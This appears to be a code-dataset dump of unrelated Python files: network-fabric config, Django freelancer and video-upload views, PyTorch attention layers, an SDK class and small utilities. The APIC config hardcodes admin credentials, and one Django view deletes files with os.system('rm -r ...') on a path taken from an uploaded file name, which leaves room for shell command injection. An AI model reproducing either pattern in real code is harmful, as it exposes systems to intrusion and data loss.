name, a random value will be used otherwise.
:param filename: original filename
:param attempt: optional attempt number, defaults to null
:return: new filename
:rtype: str or unicode
'''
filename_parts = filename.rsplit('.', 2)
name = filename_parts[0]
ext = ''.join('.%s' % ext for ext in filename_parts[1:])
if attempt is None:
extra = ' %s' % ''.join(random.choice(fs_safe_characters) for i in range(8))
else:
extra = ' (%d)' % attempt
return '%s%s%s' % (name, extra, ext)
| process-project/UC3-Portal_fork | browsepy/file.py | file.py | py | 15,912 | python | en | code | null | github-code | 13 |
12798436491 | import pprint
pp = pprint.PrettyPrinter(indent=4)
# APIC Login Data
APIC_URL = "https://15.186.7.16/"
APIC_USERNAME = "admin"
APIC_PASSWORD = "password"
# NOTE: Objects you don't want to create? Just mark them out
# Common variables for both Fabric Access Policies and VM Networking
# L2_INTERFACE_POLICIES = [
# {
# "name": "PerPort-VLAN_L2_IP",
# "descr": "",
# "qinq": "disabled",
# "reflectiveRelay": "disabled",
# "vlanScope": "portlocal"
# }
# ]
#
# LLDP_INTERFACE_POLICIES = [
# {
# "name": "LLDP-Enable-Bidirection",
# "adminRxSt": "enabled",
# "adminTxSt": "enabled",
# "descr": "",
# "nameAlias": ""
# }
# ]
#
# CDP_INTERFACE_POLICIES = [
# {
# "name": "Disable-CDP",
# "descr": "",
# "nameAlias": "",
# "adminSt": "disabled"
# }
# ]
#
# PORT_CHANNEL_INTERFACE_POLICIES = [
# {
# "name": "LACP-Active",
# "descr": "",
# "nameAlias": "",
# "mode": "active",
# "ctrl": "fast-sel-hot-stdby,graceful-conv,susp-individual",
# "minLinks": "1",
# "maxLinks": "16"
# }
# ]
VLAN_POOLS_8_COUNTS_10_TO_1000 = [
{
"name": "Eagle10-5ME-CL10_vlan_10-200",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "10",
"endVlan": "200"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_201-300",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "201",
"endVlan": "300"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_301-400",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "301",
"endVlan": "400"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_401-500",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "401",
"endVlan": "500"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_501-600",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "501",
"endVlan": "600"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_601-700",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "601",
"endVlan": "700"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_701-800",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "701",
"endVlan": "800"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_801-1000",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "801",
"endVlan": "900"
},
{
"startVlan": "901",
"endVlan": "1000"
}
]
}
]
VLAN_POOLS_1_COUNT_10_TO_1000 = [
{
"name": "Eagle10-5ME-CL10_vlan_10-1000",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "10",
"endVlan": "200"
},
{
"startVlan": "201",
"endVlan": "300"
},
{
"startVlan": "301",
"endVlan": "400"
},
{
"startVlan": "401",
"endVlan": "500"
},
{
"startVlan": "501",
"endVlan": "600"
},
{
"startVlan": "601",
"endVlan": "700"
},
{
"startVlan": "701",
"endVlan": "800"
},
{
"startVlan": "801",
"endVlan": "900"
},
{
"startVlan": "901",
"endVlan": "1000"
}
]
}
]
VLAN_POOLS = VLAN_POOLS_1_COUNT_10_TO_1000
# VM Networking
# VCENTER_DOMAINS = [
# {
# "name": "vDS_ESXi-jason",
# aka epRetTime
# "endPointRetentionTime": "0",
# aka vmmCtrlrP
# "vCenterController": [
# {
# "name": "OV-VC1-jason",
# "hostOrIp": "15.186.9.63",
# "dvsVersion": "unmanaged",
# "rootContName": "ESXI_DATACENTER-jason",
# aka n1kvStatsMode
# "statsCollection": "enabled",
# aka vmmUsrAccP
# "vmmCredential" : {
# "name": "JasonPernito",
# "descr": "",
# aka usr
# "userName": "jpernito",
# aka pwd
# "password": "password"
# }
# }
# ],
# aka aaaDomainRef
# "securityDomains": [],
# "vlanPool": VLAN_POOLS[0],
# aka vmmVSwitchPolicyCont
# "vSwitchPolicies": {
# aka vmmRsVswitchOverrideLacpPol
# "portChannelPolicy": "LACP-Active-jason",
# aka vmmRsVswitchOverrideLldpIfPol
# "lldpPolicy": "LLDP-Enable-Bidirection-jason",
# vmmRsVswitchOverrideCdpIfPol
# "cdpPolicy": "Disable-CDP-jason"
# },
# "attachableEntityProfile": "Eagle10-5ME-CL10-jason_attachableAEP"
# }
# ]
#
# Fabric
PHYSICAL_DOMAINS = [
{
"name": "Eagle10-5ME-CL10-PD_10-TO-1000",
"vlanPool": VLAN_POOLS[0]
}
]
AAEPS = [
{
"name": "Eagle10-5ME-CL10_attachableAEP",
"physicalDomain": PHYSICAL_DOMAINS[0]['name']
}
]
POLICY_GROUPS = [
{
"name": "Eagle10-5ME-CL10_accPortGrp",
"aepName": AAEPS[0]['name'],
"cdpPolicy": "Disable-CDP",
"lldpPolicy": "LLDP-Enable-Bidirection",
"l2Policy": "PerPort-VLAN_L2_IP",
"type": "accessPort"
},
{
"name": "Eagle10-5ME-CL10_vpcPolicyGrp",
"aepName": AAEPS[0]['name'],
"cdpPolicy": "Disable-CDP",
"lldpPolicy": "LLDP-Enable-Bidirection",
"l2Policy": "PerPort-VLAN_L2_IP",
"lacpLagPolicy": "LACP-Active",
"type": "vPC"
}
]
# Leaf Interface Profile (and Access Port Selector)
LEAF_INTERFACE_PROFILES = [
{
"name": "Eagle10-5ME-CL10_leafInterfaceProfile",
"accessPortSelector": [
{
"name": "Eagle10-5ME-CL10_accessPortSelector",
"policyGroup": POLICY_GROUPS[1],
"interfaces": [
{
"blockName": "block1_17-to-20",
"fromCard": "1",
"toCard": "1",
"fromPort": "17",
"toPort": "20"
}
]
}
]
},
{
"name": "Eagle10-5ME-CL10-TCS_leafInterfaceProfile",
"accessPortSelector": [
{
"name": "Eagle10-5ME-CL10_TCS_accessPortSelector",
"policyGroup": POLICY_GROUPS[0],
"interfaces": [
{
"blockName": "block1_14",
"fromCard": "1",
"toCard": "1",
"fromPort": "14",
"toPort": "14"
}
]
}
]
}
]
LEAF_PROFILES = [
{
"name": "Eagle10-5ME-CL10_leafProfile_101",
"leafSelectors": [
{
"name": "Eagle10-5ME-CL10_leafSelector_101",
"blocks": [
{
"name": "block_101",
"from_": "101",
"to_": "101"
}
]
}
],
"leafInterfaceProfile": "Eagle10-5ME-CL10_leafInterfaceProfile"
},
{
"name": "Eagle10-5ME-CL10_leafProfile_103",
"leafSelectors": [
{
"name": "Eagle10-5ME-CL10_leafSelector_103",
"blocks": [
{
"name": "block_103",
"from_": "103",
"to_": "103"
}
]
}
],
"leafInterfaceProfile": "Eagle10-5ME-CL10_leafInterfaceProfile"
},
{
"name": "Eagle10-5ME-CL10_TCS_leafProfile",
"leafSelectors": [
{
"name": "Eagle10-5ME-CL10_TCS_leafSelector",
"blocks": [
{
"name": "block_101",
"from_": "101",
"to_": "101"
}
]
}
],
"leafInterfaceProfile": "Eagle10-5ME-CL10-TCS_leafInterfaceProfile"
}
]
# Tenant and App Details for the Test Environment.
def create_x_tenants(prefix, count):
"""
Create x number of tenants.
Arguments:
prefix - tenants name prefix
count - x number of tenants
Return:
list of tenants in prefix + '_' + count format
"""
tenants = []
for x in xrange(0, count):
tenants.append(prefix + '_' + str(x))
return tenants
TENANT_PREFIX = "Eagle10-5ME-CL10"
TENANT_COUNT = 50
TENANTS = create_x_tenants(TENANT_PREFIX, TENANT_COUNT)
# Application Profiles
def define_application_profiles(tenant_prefix, profile_prefix, count):
"""
Define application profiles. This assumes 1:1 profile to tenant ratio.
Arguments:
tenant_prefix - tenants name prefix
profile_prefix - profile name prefix
count - x number of profiles
Return:
dictionary of tenant-profile key-value pair
"""
profiles = {}
for x in xrange(0, count):
profiles[tenant_prefix + '_' + str(x)] = profile_prefix + '_' + str(x)
return profiles
PROFILE_PREFIX = "Eagle10-ApplicationProfile"
APP_PROFILES = define_application_profiles(TENANT_PREFIX, PROFILE_PREFIX, TENANT_COUNT)
STATIC_PORTS = {
'US1': [
{'pod': '1', 'node': 'paths-101', 'path': 'eth1/13'},
{'pod': '1', 'node': 'protpaths-101-103', 'path': 'Eagle10-5ME-CL10_vpcPolicyGrp'}
]
}
# VLAN Ranges to configure on ACI/APIC
def define_tenant_vlan_range(tenant_prefix, tenant_count, start_vlan, end_vlan):
"""
Define tenant vlan ranges by distributing total_vlans tenant_count.
Argument:
tenant_prefix - tenants name prefix
tenant_count - x number of tenants
total_vlans - x number of vlans
Return:
dictionary of tenants vlan ranges like this:
TENANTS[0]: [
{'start': 10, 'end': 200, 'encap': 'vlan'},
{'start': 201, 'end': 300, 'encap': 'vlan'},
{'start': 301, 'end': 400, 'encap': 'vlan'},
{'start': 401, 'end': 500, 'encap': 'vlan'},
{'start': 501, 'end': 600, 'encap': 'vlan'},
{'start': 601, 'end': 700, 'encap': 'vlan'},
{'start': 701, 'end': 800, 'encap': 'vlan'},
{'start': 801, 'end': 1000, 'encap': 'vlan'}
]
"""
tenant_vlans = {}
# calculate total vlans
total_vlans = (end_vlan - start_vlan) + 1
est_vlan = int(total_vlans / tenant_count)
for x in xrange(0, tenant_count):
if x != (tenant_count - 1):
tenant_vlans[tenant_prefix + '_' + str(x)] = [{'start': start_vlan, 'end': start_vlan + est_vlan, 'encap': 'vlan'}]
else:
tenant_vlans[tenant_prefix + '_' + str(x)] = [{'start': start_vlan, 'end': end_vlan, 'encap': 'vlan'}]
start_vlan = start_vlan + est_vlan + 1
return tenant_vlans
VLAN_RANGES = define_tenant_vlan_range(TENANT_PREFIX, TENANT_COUNT, 10, 1000)
# Bridge Domain has to map with EPG and vice versa
def define_bridge_domains(tenant_prefix, bd_prefix, tenant_count):
"""
Define bridge domains.
Arguments:
tenant_prefix - tenant name prefix
bd_prefix - bridge domain name prefix
tenant_count - x number of tenants
Return:
dictionary of bridge domains
"""
bridge_domains = {}
for x in xrange(0, tenant_count):
bridge_domains[tenant_prefix + '_' + str(x)] = [{"namePrefix": bd_prefix, "vlanRange": VLAN_RANGES[TENANTS[x]][0], "scope": None, "subnetIPv4Addr": None, "arpFlood": "yes", "unkMacUcastAct": "flood"}]
return bridge_domains
BD_PREFIX = "BD_Vlan-"
BRIDGE_DOMAINS = define_bridge_domains(TENANT_PREFIX, BD_PREFIX, TENANT_COUNT)
# EPGs
# NOTE: Since we are using 1:1 mapping of BD and EPG, we will be using the same vlanRange defined in BD.
def define_epgs(tenant_prefix, epg_prefix, tenant_count):
"""
Define EPGS.
Argument:
tenant_prefix - tenant name prefix
epg_prefix - EPG name prefix
tenant_count - x number of tenants
Return:
dictionary of EPGs
"""
epgs = {}
for x in xrange(0, tenant_count):
epgs[tenant_prefix + '_' + str(x)] = [{"namePrefix": epg_prefix, "bridgeDomain": BRIDGE_DOMAINS[TENANTS[x]][0], 'staticPorts': STATIC_PORTS['US1'], "domain": {"profile": "Eagle10-5ME-CL10-PD_10-TO-1000", "type": "phys"}}]
return epgs
EPG_PREFIX = "EPG_vlan-"
EPGS = define_epgs(TENANT_PREFIX, EPG_PREFIX, TENANT_COUNT)
# VRF can be 1 to many BD
def define_vrfs(tenant_prefix, vrf_prefix, count):
"""
Define VRFs. This assumes 1:1 vrf to tenant ratio.
Arguments:
tenant_prefix - tenants name prefix
profile_prefix - profile name prefix
count - x number of profiles
Return:
dictionary of tenant-profile key-value pair
"""
vrfs = {}
for x in xrange(0, count):
vrfs[tenant_prefix + '_' + str(x)] = vrf_prefix + '_' + str(x)
return vrfs
VRF_PREFIX = "Eagle10-VRF"
VRFS = define_vrfs(TENANT_PREFIX, VRF_PREFIX, TENANT_COUNT)
| richa92/Jenkin_Regression_Testing | robo4.2/fusion/tests/wpst_crm/ci_fit/tools/aci/resources/5ME-CL10-APIC_multi_data_variable.py | 5ME-CL10-APIC_multi_data_variable.py | py | 14,197 | python | en | code | 0 | github-code | 13 |
73054672977 | from pynput import keyboard
import pandas as pd
from win10toast import ToastNotifier
def on_activate():
df = pd.read_clipboard()
toster = ToastNotifier()
toster.show_toast("title", df.columns[0], duration=5)
with keyboard.GlobalHotKeys({
'<ctrl>': on_activate}) as h:
h.join()
| FlintyLemming/picManagementUtilities | duplicateCheck/main.py | main.py | py | 315 | python | en | code | 0 | github-code | 13 |
19375055905 | #!/usr/bin/python
def beast(id):
if id == 'Goblin Smuggler' or id == '1' or id == 'goblin':
monster = {'name': 'Goblin Smuggler', 'hp': 5, 'max': 2, 'min': 1, 'def': 0, 'agi': 20, 'acc': 5, 'crit': 1, 'exp': 25}
if id == 'Giant Rat' or id == '2' or id == 'rat':
monster = {'name': 'Giant Rat', 'hp': 7, 'max': 2, 'min': 1, 'def': 0, 'agi': 25, 'acc': 1, 'crit': 5, 'exp': 35}
if id == 'Rock Crab' or id == 'crab' or id == '3':
monster = {'name': 'Rock Crab', 'hp': 5, 'max': 1, 'min': 1, 'def': 2, 'agi': 10, 'acc': 1, 'crit': 1, 'exp': 25}
if id == 'Armored Bear' or id == '4' or id == 'bear':
monster = {'name': 'Armored Bear', 'hp': 10, 'max': 1, 'min': 1, 'def': 1, 'agi': 10, 'acc': 1, 'crit': 1, 'exp': 35}
if id == 'Beserk Farmer' or id == '5' or id =='farmer':
monster = {'name': 'Beserk Farmer', 'hp': 5, 'max': 2, 'min': 2, 'def': 0, 'agi': 15, 'acc': 1, 'crit': 1, 'exp': 35}
if id == 'Wizard Novice' or id == '6' or id == 'wizard':
monster = {'name': 'Wizard Novice', 'hp': 5, 'max': 4, 'min': 0, 'def': -1, 'agi': 15, 'acc': 1, 'crit': -1, 'exp': 25}
if id == 'Stone Golem' or id == 'golem' or id == '7':
monster = {'name': 'Stone Golem', 'hp': 20, 'max': 4, 'min': 2, 'def': 4, 'agi': 0, 'acc': -10, 'crit': 1, 'exp': 500}
if id == 'Enraged Minotaur' or id == 'bull' or id == '8':
monster = {'name': 'Enraged Minotaur', 'hp': 20, 'max': 6, 'min': 4, 'def': 2, 'agi': 10, 'acc': 0, 'crit': 1, 'exp': 500}
if id == 'Highway Man' or id == 'robber' or id == '9':
monster = {'name': 'Highway Man', 'hp': 15, 'max': 5, 'min': 1, 'def': 0, 'agi': 45, 'acc': 10, 'crit': 20, 'exp': 500}
if id == 'Agile Marksman' or id == 'archer' or id == '10':
monster = {'name': 'Agile Marksman', 'hp': 15, 'max': 5, 'min': 1, 'def': 1, 'agi': 30, 'acc': 20, 'crit': 10, 'exp': 500}
if id == 'Elemental Apparition' or id == 'spirit' or id == '11':
monster = {'name': 'Elemental Apparition', 'hp': 12, 'max': 10, 'min': 0, 'def': 0, 'agi': 15, 'acc': 1, 'crit': -1, 'exp': 500}
return monster
| deathkj/battle | beastiary.py | beastiary.py | py | 2,123 | python | en | code | 0 | github-code | 13 |
18445803662 | '''
This model is to build a attention layer.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['attention_layer', 'attention_layer_light']
class attention_layer(nn.Module):
def __init__(self, in_dim, texture_dim):
super(attention_layer, self).__init__()
self.query_conv = nn.Conv2d(in_channels=texture_dim, out_channels=in_dim//8 , kernel_size=1)
self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim//8 , kernel_size=1)
self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
self.final_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
self.softmax = nn.Softmax(dim=-1)
self.gamma = nn.Parameter(torch.zeros(1))
def forward(self, x, z):
'''
input:
x: feature maps (batch, C_in, H, W)
z: texture images (batch, C_texture, H, W)
output:
out: gamma*attention value + input feature maps (batch, C_in, H, W)
attention: (batch, N, N), N=W*H
'''
batch, C, W ,H = x.size()
proj_query = self.query_conv(z).view(batch,-1,W*H).permute(0,2,1) # (batch, C, N) -> (batch, N, C)
proj_key = self.key_conv(x).view(batch,-1,W*H) # (batch, C, N)
energy = torch.bmm(proj_query,proj_key) # batch matrix by matrix multiplication
attention = self.softmax(energy) # (batch, N, N)
proj_value = self.value_conv(x).view(batch,-1,W*H) # (batch, C, N)
out = torch.bmm(proj_value,attention.permute(0,2,1)) # (batch, C, N)
out = out.view(batch,C,W,H)
out = self.final_conv(out) # (batch C, W, H)
out = self.gamma*out + x
return out, attention
class attention_layer_light(nn.Module):
def __init__(self, in_dim):
super(attention_layer_light, self).__init__()
self.conv1 = nn.Conv2d(in_dim, in_dim, kernel_size=3, stride=1, padding=1)
self.conv2 = nn.Conv2d(in_dim, 1, kernel_size=1, stride=1)
self.softmax = nn.Softmax(dim=-1)
self.gamma = nn.Parameter(torch.zeros(1))
self.in_dim = in_dim
def forward(self, x):
'''
input:
x: feature maps (batch, C_in, H, W)
output:
out: gamma*attention value + input feature maps (batch, C_in, H, W)
attention: (batch, H, W)
'''
x_origin = x
x = self.conv1(x) # (batch, C_in, H, W)
combine = self.conv2(torch.tanh(x)) # [batch, 1, H, W]
combine_flat = combine.view(combine.size(0), -1) # resize to [batch, H*W]
attention_weights = self.softmax(combine_flat) # [batch, H*W]
attention_weights = attention_weights.view(combine.size()) # [batch, 1, H, W]
glimpse = x_origin * attention_weights.repeat(1, self.in_dim, 1, 1) # [batch, C_in, H, W]
out = self.gamma * glimpse + x_origin # [batch, C_in, H, W]
return out, attention_weights
# unit testing
if __name__ == '__main__':
# fake input feature map
batch_size = 2
Height = 32
Width = 32
Channel = 128
texture_dim = 1
features = torch.randn(batch_size,Channel,Height,Width)
texture_image = torch.randn(batch_size, texture_dim, Height, Width)
attn_layer = attention_layer(Channel, texture_dim)
new_features, att_map = attn_layer(features, texture_image)
print(new_features)
print("shape of new feature map is:", new_features.shape)
print("shape of attention map is:", att_map.shape)
batch_size = 16
Height = 160
Width = 160
Channel = 512
features = torch.randn(batch_size,Channel,Height,Width)
attn_layer = attention_layer_light(Channel)
new_features, att_map = attn_layer(features)
print(new_features)
print(att_map[0][0].sum())
print("shape of new feature map is:", new_features.shape)
print("shape of attention map is:", att_map.shape) | liuch37/tanet-pytorch | models/attention_layer.py | attention_layer.py | py | 3,899 | python | en | code | 0 | github-code | 13 |
17055240444 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class LabelFilter(object):
def __init__(self):
self._column_name = None
self._op = None
self._values = None
@property
def column_name(self):
return self._column_name
@column_name.setter
def column_name(self, value):
self._column_name = value
@property
def op(self):
return self._op
@op.setter
def op(self, value):
self._op = value
@property
def values(self):
return self._values
@values.setter
def values(self, value):
if isinstance(value, list):
self._values = list()
for i in value:
self._values.append(i)
def to_alipay_dict(self):
params = dict()
if self.column_name:
if hasattr(self.column_name, 'to_alipay_dict'):
params['column_name'] = self.column_name.to_alipay_dict()
else:
params['column_name'] = self.column_name
if self.op:
if hasattr(self.op, 'to_alipay_dict'):
params['op'] = self.op.to_alipay_dict()
else:
params['op'] = self.op
if self.values:
if isinstance(self.values, list):
for i in range(0, len(self.values)):
element = self.values[i]
if hasattr(element, 'to_alipay_dict'):
self.values[i] = element.to_alipay_dict()
if hasattr(self.values, 'to_alipay_dict'):
params['values'] = self.values.to_alipay_dict()
else:
params['values'] = self.values
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = LabelFilter()
if 'column_name' in d:
o.column_name = d['column_name']
if 'op' in d:
o.op = d['op']
if 'values' in d:
o.values = d['values']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/LabelFilter.py | LabelFilter.py | py | 2,089 | python | en | code | 241 | github-code | 13 |
11665042650 | import plotly.offline as pyo
import plotly.graph_objs as go
import pandas as pd
df=pd.read_csv('plotly\\Plotly-Dashboards-with-Dash-master\\Data\\2018WinterOlympics.csv')
trace0=go.Bar(x=df['NOC'],y=df['Gold'],name='Gold',marker={'color':'#FFD700'})
trace1=go.Bar(x=df['NOC'],y=df['Silver'],name='Silver',marker={'color':'#9EA0A1'})
trace2=go.Bar(x=df['NOC'],y=df['Bronze'],name='Bronze',marker={'color':'#CD7F32'})
data=[trace0,trace1,trace2]
layout=go.Layout(title="Total Medals")# for stacking barmode='stack')
fig=go.Figure(data,layout)
pyo.plot(fig)
| jyothsnashaji/plotly-dash | barchart.py | barchart.py | py | 578 | python | en | code | 0 | github-code | 13 |
3750508320 | from calendar import month_name
from django.contrib.auth.decorators import login_required
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.db.models import Q
from django.http import JsonResponse, Http404, HttpResponseBadRequest
from django.shortcuts import render, get_object_or_404, redirect
from django.template.loader import render_to_string
from accounts.decorators import freelancer_required, valid_user_for_proposal
from employer.models import PostTask
from hireo.models import HitCount
from .forms import ProposalForm
from .models import Proposal
from employer.models import Offers
from notification.models import Notification, notification_handler
@login_required
@freelancer_required
def submit_proposals(request):
try:
if request.method == "POST" and request.is_ajax():
task = get_object_or_404(PostTask, pk=request.POST['task_id'])
if task.proposals.filter(user=request.user).exists():
return JsonResponse({"success": False, "errors": "You bid has already been submitted."})
form = ProposalForm(request.POST)
if form.is_valid():
proposal = form.save(commit=False)
proposal.user = request.user
proposal.task = task
proposal.save()
return JsonResponse(
{"success": True, "msg": "Your bid has been submitted.", "url": redirect('my_proposals').url})
else:
errors = {field: str(error[0])[1:-1][1:-1] for (field, error) in form.errors.as_data().items()}
return JsonResponse({'success': False, 'errors': errors})
else:
return HttpResponseBadRequest()
except Exception as e:
raise Http404(str(e))
@login_required
@freelancer_required
def my_proposals(request):
sort = request.GET.get("sort-by", None)
proposal_list = Proposal.objects.filter(user=request.user).select_related("task").exclude(task_id=None).order_by(
'-updated_at')
if sort != 'pending' and sort != "relevance" and sort:
proposal_list = proposal_list.filter(status__iexact=sort)
elif sort == "pending":
proposal_list = proposal_list.filter(status__isnull=True)
else:
order = ['accepted', None, 'completed', 'cancelled']
order = {key: i for i, key in enumerate(order)}
proposal_list = sorted(proposal_list, key=lambda proposal: order.get(proposal.status, 0))
# proposal_list = proposal_list.order_by('-created_at')
page = request.GET.get('page', 1)
paginator = Paginator(proposal_list, 4)
try:
proposals = paginator.page(page)
except PageNotAnInteger:
proposals = paginator.page(1)
except EmptyPage:
proposals = paginator.page(paginator.num_pages)
return render(request, 'Freelancer/MyProposals.html', {"proposals": proposals})
@login_required
@freelancer_required
@valid_user_for_proposal
def delete_proposal(request, id):
try:
if request.method == "POST" and request.is_ajax():
proposal = get_object_or_404(Proposal, pk=id)
if proposal.status is not None:
return JsonResponse(
{"success": False, "errors": "You are not permitted to delete this Proposal"})
proposal.delete()
html = None
if not request.user.proposals.exclude(task_id=None).exists():
msg = "Currently you have not placed any bid yet."
html = render_to_string("common/partial_empty_msg.html", {"msg": msg})
return JsonResponse(
{"success": True, "deleted": True, "html": html, "msg": "Proposal successfully deleted."})
else:
raise Http404("Invalid request")
except Exception as e:
raise Http404(str(e))
@login_required
@freelancer_required
@valid_user_for_proposal
def cancel_task(request, id):
try:
if request.method == "POST" and request.is_ajax():
proposal = get_object_or_404(Proposal, pk=id)
proposal.task.job_status = "Pending"
proposal.status = "cancelled"
proposal.task.save()
proposal.save()
# calculate success rate and overall profile rating
user = request.user
user.profile.success_rate = user.profile.calculate_success_rate()
user.profile.rating = user.profile.calculate_rating()
user.profile.save()
notification_handler(request.user, proposal.task.user, Notification.TASK_CANCELLED, target=proposal.task)
return JsonResponse({"success": True, "msg": "Job cancelled."})
else:
raise Http404("Invalid request")
except Exception as e:
raise Http404(str(e))
@login_required
@freelancer_required
@valid_user_for_proposal
def task_completed(request, id):
try:
if request.method == "POST" and request.is_ajax():
proposal = get_object_or_404(Proposal, pk=id)
proposal.task.job_status = 'Completed'
proposal.user.profile.total_job_done += 1
proposal.status = 'completed'
proposal.task.save()
proposal.user.profile.save()
proposal.save()
# calculate success rate and overall profile rating
user = request.user
user.profile.success_rate = user.profile.calculate_success_rate()
user.profile.rating = user.profile.calculate_rating()
user.profile.save()
notification_handler(request.user, proposal.task.user, Notification.TASK_COMPLETED, target=proposal.task)
return JsonResponse({"success": True, "msg": "Job Completed."})
else:
raise Http404("Invalid request")
except Exception as e:
raise Http404(str(e))
@login_required
@freelancer_required
def dashboard(request):
views = HitCount.objects.filter(profile=request.user.profile)
month = request.user.profile.created_at.month
data = [views.filter(created_at__month=((month + x) % 12) or 12).count() or '' for x in range(6)]
labels = [month_name[((month + i) % 12) or 12] for i in range(6)]
# notifications
notifications_list = request.user.notifications.all()
page = request.GET.get('page', 1)
paginator = Paginator(notifications_list, 5)
try:
notifications = paginator.page(page)
except PageNotAnInteger:
notifications = paginator.page(1)
except EmptyPage:
notifications = paginator.page(paginator.num_pages)
if request.is_ajax():
html = render_to_string("Notification/include/partial_dashboard_notifications_list.html",
{"notifications": notifications})
return JsonResponse({"success": True, "html": html})
context = {
"labels": labels,
"data": data,
"notifications": notifications
}
render_to_string('Freelancer/includes/partial_views_chart.html', context)
return render(request, 'Freelancer/Dashboard.html', context)
@login_required
@freelancer_required
def offers(request):
offer_list = Offers.objects.filter(profile=request.user.profile).order_by('-created_at')
page = request.GET.get('page', None)
paginator = Paginator(offer_list, 4)
try:
offer_list = paginator.page(page)
except PageNotAnInteger:
offer_list = paginator.page(1)
except EmptyPage:
offer_list = paginator.page(paginator.num_pages)
return render(request, 'Freelancer/Offers.html', {"offers": offer_list})
@login_required
@freelancer_required
def delete_offer(request, id):
try:
if request.method == "POST" and request.is_ajax():
offer = get_object_or_404(Offers, pk=id)
if offer:
if offer.profile != request.user.profile:
return JsonResponse(
{"success": False, "errors": "You are not permitted to perform this operation."})
offer.delete()
html = None
if not request.user.profile.offers.exists():
msg = "There is no offers."
html = render_to_string("common/partial_empty_msg.html", {"msg": msg})
return JsonResponse({"success": True, "msg": "Offer Deleted", "html": html})
else:
raise Http404("Invalid request")
except Exception as e:
raise Http404(str(e))
@login_required
@freelancer_required
def reviews(request):
proposal_list = Proposal.objects.filter(Q(user=request.user) & Q(task__isnull=False)).order_by("-updated_at")
if proposal_list.exists():
proposal_list = proposal_list.filter(Q(status__iexact="completed") & ~Q(rating=0.0))
page = request.GET.get('page', 1)
paginator = Paginator(proposal_list, 3)
try:
proposals = paginator.page(page)
except PageNotAnInteger:
proposals = paginator.page(1)
except EmptyPage:
proposals = paginator.page(paginator.num_pages)
return render(request, 'Freelancer/Reviews.html', {"proposals": proposals})
| umairkhan987/Job-Boards | freelancers/views.py | views.py | py | 9,162 | python | en | code | 0 | github-code | 13 |
27470947255 | from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
from .models import Video
from django.http import HttpResponse
from django.http import HttpResponseForbidden
from django.contrib.auth.decorators import login_required
import os
from hc.settings import BASE_DIR
def index(request):
ctx = {
'section': "help-videos",
'videos': Video.objects.all()
}
return render(request, 'help_videos/videos.html', ctx)
def admin_required(func):
# define admin checking decorator
def wrap(request):
if request.user.is_superuser:
return func(request)
else:
return HttpResponseForbidden()
wrap.__name__ = func.__name__
wrap.__doc__ = func.__doc__
return wrap
def verify_filetype(func):
def wrap(request):
file_name = request.FILES["video-file"].name
ext = file_name.split(".")[-1]
# can check for more extensions here
if ext == 'mp4':
return func(request)
else:
return HttpResponse("Only mp4 video files allowed at the moment, .{} file types not allowed".format(ext))
return wrap
@login_required
@admin_required
@verify_filetype
def upload(request):
if request.method == 'POST':
title, desc = request.POST['title'], request.POST['description']
video = request.FILES['video-file']
if len(title) < 1 or len(desc) < 1:
return HttpResponse("Please fill all fields")
fstorage = FileSystemStorage()
fname = fstorage.save(video.name, video)
upload_uri = fstorage.url(fname)
# Add entry to database
video = Video(title=title, description=desc, resource_url=upload_uri)
video.save()
return HttpResponse("success")
else:
return HttpResponse("failed")
@login_required
@admin_required
def delete_video(request):
if request.method == 'POST':
request_id = request.POST['id']
if request_id:
obj = Video.objects.filter(id=request_id).first()
# do a hard delete
os.system("rm -r {}".format("{}{}".format(BASE_DIR,
obj.resource_url).replace("%20", "\ ")))
Video.objects.filter(id=request_id).delete()
return HttpResponse("success".format(BASE_DIR))
else:
return HttpResponse("Operation not allowed")
| andela/dashiki-healthchecks | hc/help_videos/views.py | views.py | py | 2,440 | python | en | code | 1 | github-code | 13 |
327009991 | import re
from jamo import h2j, j2hcj
from cached_property import cached_property
from pathlib import Path
import pandas as pd
"""a list of vowels"""
korean_vowel = ['ㅏ','ㅑ', 'ㅓ', 'ㅕ', 'ㅗ', 'ㅛ', 'ㅜ', 'ㅠ', 'ㅡ','ㅣ','ㅒ',
'ㅐ','ㅔ', 'ㅖ', 'ㅟ', 'ㅚ', 'ㅙ', 'ㅞ']
"""a string to a list"""
def make_list(words):
output = [re.sub('[^가-힣]', '', w) for w in words.split(',')]
return [w for w in output if len(w) > 0]
"""open the file"""
def open_dir(dir):
if dir.endswith('.xlsx'):
return pd.read_excel(dir, header = 0)
elif dir.endswith('.csv'):
return pd.read_excel(dir, header = 0)
else:
raise Exception('The type of file should be csv or xlsx')
"""save_the_file"""
def save_file(result, output_dir, file_name, output_type = 'xlsx'):
output_dir = Path(output_dir)
output_dir.mkdir(exist_ok = True)
file_name = re.sub('/','-',file_name)
if output_type == 'xlsx':
file_name += '.xlsx'
pd.DataFrame(result).to_excel(output_dir / Path(file_name))
elif output_type == 'csv':
file_name += '.csv'
pd.DataFrame(result).to_csv(output_dir / Path(file_name))
else:
raise Exception('The type of file should be csv or xlsx')
class Jongsung:
